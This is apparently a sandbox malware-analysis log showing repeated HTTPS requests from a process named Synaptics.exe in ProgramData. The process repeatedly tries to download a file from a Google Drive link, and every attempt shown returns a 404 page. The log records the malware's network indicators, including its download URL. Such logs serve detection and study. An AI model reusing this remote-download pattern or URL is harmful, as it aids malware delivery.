                                                                                                                                                                                        Data Ascii: 0%}}#logo{display:inline-block;height:54px;width:150px}</style><main id="af-error-container" role="main"><a href=//www.google.com><span id=logo aria-label=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not
                                                                                                                                                                                        2022-05-17 11:31:52 UTC501INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        164192.168.2.349934142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:31:51 UTC498OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:31:52 UTC501INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:31:52 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-TMYTNZOonB0Nb037YfanKg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:31:52 UTC502INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 7a 64 57 54 49 7a 6d 71 62 47 4d 66 58 46 54 65 55 71 75 4a 72 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="zdWTIzmqbGMfXFTeUquJrg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans
                                                                                                                                                                                        2022-05-17 11:31:52 UTC504INData Raw: 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e 0d 0a
                                                                                                                                                                                        Data Ascii: l=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>
                                                                                                                                                                                        2022-05-17 11:31:52 UTC504INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        165192.168.2.349935142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:31:52 UTC501OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:31:52 UTC504INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:31:52 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-tEvDbdp0NNxkDY/SwvRk+g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:31:52 UTC506INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 65 54 68 50 52 45 64 46 73 33 48 44 36 45 30 6c 74 65 63 63 42 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="eThPREdFs3HD6E0lteccBg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans
                                                                                                                                                                                        2022-05-17 11:31:52 UTC507INData Raw: 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e 0d 0a
                                                                                                                                                                                        Data Ascii: l=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>
                                                                                                                                                                                        2022-05-17 11:31:52 UTC507INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        166192.168.2.349936142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:31:52 UTC504OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:31:52 UTC507INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:31:52 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-cI6JBJOd5Nf06gxc2cA6Lg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:31:52 UTC509INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta ch
                                                                                                                                                                                        2022-05-17 11:31:52 UTC509INData Raw: 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 53 75 64 79 6c 39 4b 79 41 72 4d 4c 77 55 7a 35 31 37 49 46 62 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66
                                                                                                                                                                                        Data Ascii: arset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="Sudyl9KyArMLwUz517IFbw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff
                                                                                                                                                                                        2022-05-17 11:31:52 UTC510INData Raw: 30 25 7d 7d 23 6c 6f 67 6f 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 35 34 70 78 3b 77 69 64 74 68 3a 31 35 30 70 78 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 61 69 6e 20 69 64 3d 22 61 66 2d 65 72 72 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 22 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 3e 3c 61 20 68 72 65 66 3d 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 3e 3c 73 70 61 6e 20 69 64 3d 6c 6f 67 6f 20 61 72 69 61 2d 6c 61 62 65 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20
                                                                                                                                                                                        Data Ascii: 0%}}#logo{display:inline-block;height:54px;width:150px}</style><main id="af-error-container" role="main"><a href=//www.google.com><span id=logo aria-label=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not
                                                                                                                                                                                        2022-05-17 11:31:52 UTC510INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        167192.168.2.349937142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:31:52 UTC507OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:31:52 UTC510INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:31:52 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-BTMT2q24BEDz1UVnshYJ4A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:31:52 UTC512INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta ch
                                                                                                                                                                                        2022-05-17 11:31:52 UTC512INData Raw: 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 43 6f 54 34 61 56 56 2f 6e 7a 4d 77 61 59 48 33 6f 2f 39 55 76 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66
                                                                                                                                                                                        Data Ascii: arset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="CoT4aVV/nzMwaYH3o/9Uvg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff
                                                                                                                                                                                        2022-05-17 11:31:52 UTC513INData Raw: 30 25 7d 7d 23 6c 6f 67 6f 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 35 34 70 78 3b 77 69 64 74 68 3a 31 35 30 70 78 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 61 69 6e 20 69 64 3d 22 61 66 2d 65 72 72 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 22 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 3e 3c 61 20 68 72 65 66 3d 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 3e 3c 73 70 61 6e 20 69 64 3d 6c 6f 67 6f 20 61 72 69 61 2d 6c 61 62 65 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20
                                                                                                                                                                                        Data Ascii: 0%}}#logo{display:inline-block;height:54px;width:150px}</style><main id="af-error-container" role="main"><a href=//www.google.com><span id=logo aria-label=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not
                                                                                                                                                                                        2022-05-17 11:31:52 UTC513INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        168192.168.2.349938142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:31:52 UTC510OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:31:52 UTC513INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:31:52 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-7p5YRMsEywCHntHR5xqzEQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:31:52 UTC515INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta ch
                                                                                                                                                                                        2022-05-17 11:31:52 UTC515INData Raw: 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 45 41 45 4b 48 71 2f 4c 6d 73 72 2f 61 54 71 45 6b 51 58 34 61 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66
                                                                                                                                                                                        Data Ascii: arset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="EAEKHq/Lmsr/aTqEkQX4ag">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff
                                                                                                                                                                                        2022-05-17 11:31:52 UTC516INData Raw: 30 25 7d 7d 23 6c 6f 67 6f 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 35 34 70 78 3b 77 69 64 74 68 3a 31 35 30 70 78 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 61 69 6e 20 69 64 3d 22 61 66 2d 65 72 72 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 22 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 3e 3c 61 20 68 72 65 66 3d 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 3e 3c 73 70 61 6e 20 69 64 3d 6c 6f 67 6f 20 61 72 69 61 2d 6c 61 62 65 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20
                                                                                                                                                                                        Data Ascii: 0%}}#logo{display:inline-block;height:54px;width:150px}</style><main id="af-error-container" role="main"><a href=//www.google.com><span id=logo aria-label=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not
                                                                                                                                                                                        2022-05-17 11:31:52 UTC516INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        169192.168.2.349939142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:31:52 UTC513OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
